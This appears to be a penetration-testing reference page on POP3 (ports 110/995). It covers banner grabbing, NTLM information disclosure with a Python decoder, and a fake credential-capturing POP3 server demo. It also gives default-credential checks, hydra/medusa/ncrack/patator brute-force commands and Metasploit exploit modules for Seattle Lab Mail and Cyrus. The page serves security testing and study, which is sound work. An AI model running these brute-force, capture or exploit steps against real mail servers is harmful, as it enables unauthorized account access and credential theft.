POP3
POP3 usually uses ports 110, 995
What is POP3?
POP3 stands for Post Office Protocol version 3 (RFC 1939). As the name suggests, it treats your mailbox like a post office box: the client connects, downloads the messages to the local machine and, in the classic configuration, deletes them from the server.

When mail is fetched over POP3 a copy is stored locally on the client. Whether the originals are removed from the server depends on the client's settings ("leave a copy on the server" is a common option), but the protocol has no folders, flags or synchronised state, so once a message has been downloaded and deleted it is gone for every other client or device. Deletion is lazy: DELE only marks a message, and the server removes the marked messages when the session ends with QUIT (an RSET before QUIT undoes the marks).
Example nmap -sV output for the service:

```
PORT    STATE SERVICE VERSION
110/tcp open  pop3    Zimbra Collaboration Suite pop3d
```
POP3 Pentesting
Shodan search query:

```
port:110,995
```
Enumeration
Banner Grabbing
```
telnet 10.10.x.x 110
nc -nv 10.10.x.x 110
nmap -p110 --script=banner 10.10.x.x
nmap -p110 --script=pop3-ntlm-info 10.10.x.x
msf > use auxiliary/scanner/pop3/pop3_version #MetasploitFramework
# POP3S (port 995) is TLS-wrapped, so grab the banner through openssl
openssl s_client -connect <IP>:995 -crlf -quiet
```
Capabilities
```
# Both scripts are in nmap's default category
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 192.168.x.x
# Retrieve POP3 server capabilities (CAPA, TOP, USER, SASL, RESP-CODES, LOGIN-DELAY, PIPELINING, EXPIRE, UIDL, IMPLEMENTATION)
# LOGIN-DELAY is the minimum number of seconds the server enforces between logins, which matters when you brute force it later
nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110 192.168.x.x
```
The pop3-ntlm-info script sends an NTLM negotiate message with null credentials via AUTH NTLM and decodes the challenge the server returns. That challenge is "sensitive" in that it discloses the NetBIOS and DNS host and domain names and the Windows version of the mail server without any valid account.
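What the script actually decodes is an NTLM CHALLENGE_MESSAGE (Type 2) carried base64-encoded in a "+ " continuation line. The following is an added example, not code from the original page or from nmap: it builds a challenge with the layout from MS-NLMP section 2.2.1.2 (host names, domain and Windows version are constructed values, not a real host) and parses the server line the way pop3-ntlm-info would.

```python
"""Decode the NTLM challenge a POP3 server hands back after AUTH NTLM.

Added example, not part of the original page or of nmap's pop3-ntlm-info.
The sample server response is constructed, not captured from a real host.
"""
import base64
import struct

NTLMSSP_NEGOTIATE_VERSION = 0x02000000   # Version field is present (MS-NLMP 2.2.2.5)
CHALLENGE_HEADER_LEN = 56                # fixed part of a Type 2 message that carries Version
AV_NAMES = {1: "netbios_computer", 2: "netbios_domain",
            3: "dns_computer", 4: "dns_domain", 5: "dns_tree"}


def build_challenge(target="LAB", nb_host="MAIL01", nb_domain="LAB",
                    dns_host="mail01.lab.local", dns_domain="lab.local",
                    version=(6, 1, 7601)):
    """Construct a Type 2 message like a Windows POP3 service returns.
    Hypothetical names; only here to make the example self-contained."""
    def av_pair(av_id, text):
        value = text.encode("utf-16-le")
        return struct.pack("<HH", av_id, len(value)) + value

    target_name = target.encode("utf-16-le")
    target_info = (av_pair(1, nb_host) + av_pair(2, nb_domain) +
                   av_pair(3, dns_host) + av_pair(4, dns_domain) +
                   struct.pack("<HH", 0, 0))           # MsvAvEOL terminator
    flags = (0x00000001 | 0x00000200 | 0x00010000 |    # UNICODE, NTLM, TARGET_TYPE_DOMAIN
             0x00800000 | NTLMSSP_NEGOTIATE_VERSION)   # TARGET_INFO, VERSION
    major, minor, build = version
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)        # Signature, MessageType
    msg += struct.pack("<HHI", len(target_name), len(target_name), CHALLENGE_HEADER_LEN)
    msg += struct.pack("<I", flags)                    # NegotiateFlags
    msg += b"\x11" * 8                                 # ServerChallenge (constructed)
    msg += b"\x00" * 8                                 # Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info),
                       CHALLENGE_HEADER_LEN + len(target_name))
    msg += struct.pack("<BBH", major, minor, build) + b"\x00\x00\x00\x0f"  # Version, NTLMRevisionCurrent
    return msg + target_name + target_info


def parse_challenge(blob):
    """Return the names and OS version a Type 2 message discloses."""
    if blob[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)
    info = {"target_name": blob[tn_off:tn_off + tn_len].decode("utf-16-le")}
    if flags & NTLMSSP_NEGOTIATE_VERSION:           # 6.1.7601 is Windows 7 SP1 / 2008 R2 SP1
        major, minor, build = struct.unpack_from("<BBH", blob, 48)
        info["os_version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                           # walk the AV_PAIR list up to MsvAvEOL
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = blob[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return info


def parse_pop3_ntlm_response(line):
    """Decode the '+ <base64>' continuation line the server sends in reply to
    the client's base64 NEGOTIATE message."""
    if not line.startswith("+ "):
        raise ValueError("expected a '+ ' continuation response, got: %r" % line)
    return parse_challenge(base64.b64decode(line[2:].strip()))


# Constructed exchange on port 110 (C = client, S = server):
#   C: AUTH NTLM
#   S: +
#   C: TlRMTVNTUAABAAAA...             (base64 NEGOTIATE_MESSAGE, no credentials)
#   S: + <base64 CHALLENGE_MESSAGE>    <- the line decoded below
SAMPLE_SERVER_LINE = "+ " + base64.b64encode(build_challenge()).decode("ascii")

if __name__ == "__main__":
    for key, value in parse_pop3_ntlm_response(SAMPLE_SERVER_LINE).items():
        print(f"{key:18} {value}")
```

Against a real service you would replace SAMPLE_SERVER_LINE with the line received after sending the NEGOTIATE message; nothing in the parser depends on the constructed values.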
POP3 Commands
```
POP3 commands (RFC 1939):
USER uid         Log in as "uid"
PASS password    Send the password for the user given with USER (clear text)
APOP uid digest  Log in with an MD5 digest of the banner timestamp plus the password, if the server offers it
STAT             Number of messages and total mailbox size in octets
LIST [n]         List message numbers and sizes (or only message n)
UIDL [n]         Unique identifier of every message (or of message n)
RETR n           Retrieve message n
TOP msg n        Headers and the first n body lines of message msg
DELE n           Mark message n for deletion
RSET             Undo all deletion marks made in this session
NOOP             Keep-alive, does nothing
QUIT             Log out; messages marked with DELE are removed now unless RSET was sent
CAPA             List server capabilities (RFC 2449)
AUTH mech        SASL authentication (RFC 1734/5034), e.g. AUTH NTLM, AUTH PLAIN
```
Capturing POP3 Credentials

The module below starts a fake POP3 service that accepts any login and logs the USER/PASS it receives. It is useful when you can make clients connect to your host (for example after redirecting traffic for port 110), because POP3 sends the password in clear text.

```
msf > use auxiliary/server/capture/pop3 #MetasploitFramework
```
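The command table and the capture listener above, as one runnable walkthrough. This is an added example, not code from the original page or from Metasploit: a fake POP3 server (a small RFC 1939 subset that accepts any USER/PASS and records it, which is what a capture listener does) is started on an ephemeral localhost port, and the standard library client runs through CAPA, STAT, LIST, TOP, RETR, DELE, RSET and QUIT. The mailbox and the credentials are constructed. A second session afterwards shows what another device sees once QUIT has expunged a message.

```python
import poplib
import socket
import threading

# Constructed mailbox: two messages, one per LIST entry.
MAILBOX = [
    b"From: alice@example.test\r\nSubject: hello\r\n\r\nline one\r\nline two\r\n",
    b"From: bob@example.test\r\nSubject: report\r\n\r\nquarterly numbers\r\n",
]


class FakePop3Server(threading.Thread):
    """Just enough RFC 1939 for the walkthrough; any USER/PASS is accepted and recorded."""

    def __init__(self, mailbox):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))        # ephemeral port, no root needed
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.mailbox = list(mailbox)
        self.captured = []                      # (user, password) pairs seen in clear text

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            self.session(conn.makefile("rwb"))
            conn.close()

    def session(self, f):
        deleted, user = set(), None
        def send(line):
            f.write(line + b"\r\n"); f.flush()
        def live(): return [(i + 1, m) for i, m in enumerate(self.mailbox) if i not in deleted]
        send(b"+OK POP3 server ready")
        while True:
            line = f.readline().strip()
            if not line:
                return                          # client closed the connection
            cmd, _, arg = line.partition(b" ")
            cmd = cmd.upper()
            if cmd == b"CAPA":
                send(b"+OK")
                for cap in (b"TOP", b"UIDL", b"USER"): send(cap)
                send(b".")
            elif cmd == b"USER":
                user = arg.decode(); send(b"+OK")
            elif cmd == b"PASS":                # the capture listener's payoff
                self.captured.append((user, arg.decode())); send(b"+OK logged in")
            elif cmd == b"STAT":                # messages marked by DELE are not counted
                send(b"+OK %d %d" % (len(live()), sum(len(m) for _, m in live())))
            elif cmd == b"LIST":
                send(b"+OK")
                for n, m in live(): send(b"%d %d" % (n, len(m)))
                send(b".")
            elif cmd == b"RETR":
                send(b"+OK"); f.write(self.mailbox[int(arg) - 1]); send(b".")
            elif cmd == b"TOP":                 # headers plus the first N body lines
                n, count = (int(x) for x in arg.split())
                head, _, body = self.mailbox[n - 1].partition(b"\r\n\r\n")
                send(b"+OK"); f.write(head + b"\r\n\r\n")
                for body_line in body.split(b"\r\n")[:count]: send(body_line)
                send(b".")
            elif cmd == b"DELE":
                deleted.add(int(arg) - 1); send(b"+OK marked")
            elif cmd == b"RSET":
                deleted.clear(); send(b"+OK")
            elif cmd == b"QUIT":                # expunge happens only here
                self.mailbox = [m for _, m in live()]
                send(b"+OK bye"); return
            else:
                send(b"-ERR unsupported")


def walkthrough(port):
    """Run the command sequence from the table and return what the server answered."""
    p = poplib.POP3("127.0.0.1", port, timeout=5)
    p.user("alice"); p.pass_("s3cret")          # travels in clear text on port 110
    out = {"capa": sorted(p.capa()), "stat": p.stat(), "list": p.list()[1],
           "top": p.top(1, 1)[1], "retr": p.retr(1)[1]}
    p.dele(1); p.rset()                         # mark, then undo the mark
    out["stat_after_rset"] = p.stat()
    p.dele(1)                                   # mark again: STAT stops counting it ...
    out["stat_after_dele"] = p.stat()
    p.quit()                                    # ... and QUIT removes it for good
    return out


def message_count(port):
    """Second session, i.e. what another client or device sees afterwards."""
    p = poplib.POP3("127.0.0.1", port, timeout=5)
    p.user("alice"); p.pass_("other-device")
    count = p.stat()[0]
    p.quit()
    return count


def demo():
    server = FakePop3Server(MAILBOX)
    server.start()
    result = walkthrough(server.port)
    result["remaining"] = message_count(server.port)
    result["captured"] = list(server.captured)  # what the fake server logged
    return result
```

Run demo() and print the dictionary: stat goes from 2 messages to 1 only after the second DELE, the second session sees 1 message, and captured holds both plaintext logins. For POP3S (port 995) swap poplib.POP3 for poplib.POP3_SSL; the command sequence is identical.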
POP3 Credentials
Authentication Checking (classical credentials)
| USER  | PASS  |
|-------|-------|
| admin | admin |
| root  | root  |
| root  | toor  |
Brute Forcing
```
# hydra: plain POP3 on 110, or -S for the TLS-wrapped service on 995
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3
# nmap pop3-brute; pop3loginmethod selects a mechanism the server advertised in CAPA
nmap --script pop3-brute --script-args userdb=users.list,passdb=passwords.list -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP
msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework
medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3
ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output
# patator: FILE0 is filled from 0=users.list, FILE1 from 1=passwords.list
patator pop3_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list -x ignore:fgrep='incorrect password or account name'
```

Keep the thread count low (-t 2 and friends above): a server that advertises LOGIN-DELAY in CAPA will refuse logins that arrive faster than that, and many servers lock accounts after a few failures.
POP3 Vulnerabilities
```
#Seattle Lab Mail 5.5 [CVE-2003-0264]
msf > use exploit/windows/pop3/seattlelab_pass #MetasploitFramework
Exploit-DB: 638.py, 643.c, 646.c
#Cyrus – Gentoo 2006.0 Linux 2.6 [CVE-2006-2502]
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders #MetasploitFramework
```